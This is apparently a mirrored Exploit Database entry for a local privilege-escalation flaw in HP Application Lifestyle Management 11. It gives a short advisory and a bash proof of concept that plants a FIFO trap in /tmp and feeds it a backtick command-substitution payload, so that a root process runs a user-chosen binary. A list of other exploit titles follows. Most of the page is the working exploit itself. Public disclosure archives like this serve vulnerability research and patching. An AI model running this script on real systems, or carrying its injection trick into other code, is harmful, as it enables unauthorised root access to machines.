HP Application Lifestyle Management 11 – ‘GetInstalledPackages’ Local Privilege Escalation

Exploit Database
41 阅读

作者： anonymous

日期： 2011-12-08
类别：
- local
平台：
- linux
来源：https://www.exploit-db.com/exploits/36430/

source: https://www.securityfocus.com/bid/50982/info

HP Application Lifestyle Management is prone to a local privilege-escalation vulnerability.

Local attackers can exploit this issue to execute arbitrary code with elevated privileges. 

#!/bin/bash
# Simple PoC : Run as user, when vulnerable function is called
# /home/user/binary_to_run_as_root is run as root.
cat > file << EOF
Child Components
0a29406d9794e4f9b30b3c5d6702c708
\`/home/user/binary_to_run_as_root\`
EOF
mkfifo /tmp/tmp.txt # set trap
cat /tmp/tmp.txt# blocks for victim
while [ -e /tmp/tmp.txt ]; do
 cat file > /tmp/tmp.txt
 sleep 2
done
rm file

last Exploits
HP Application Lifestyle Management 11 – ‘GetInstalledPackages’ Local Privilege Escalation的更多信息

IDEAL Migration 2009 4.5.1 – Local Buffer Overflow：
PHP 7.0 < 7.4 (Unix) - 'debug_backtrace' disable_functions Bypass：
Juju-run Agent – Privilege Escalation (Metasploit)：
KiTTY 0.76.1.13 – Command Injection：
IcoFX – Local Stack Buffer Overflow (Metasploit)：
Canon PRINT 2.5.5 – Information Disclosure：
Microsoft Windows WMI – Recieve Notification Exploit (Metasploit)：
Microsoft Windows CONTACT – HTML Injection / Remote Code Execution：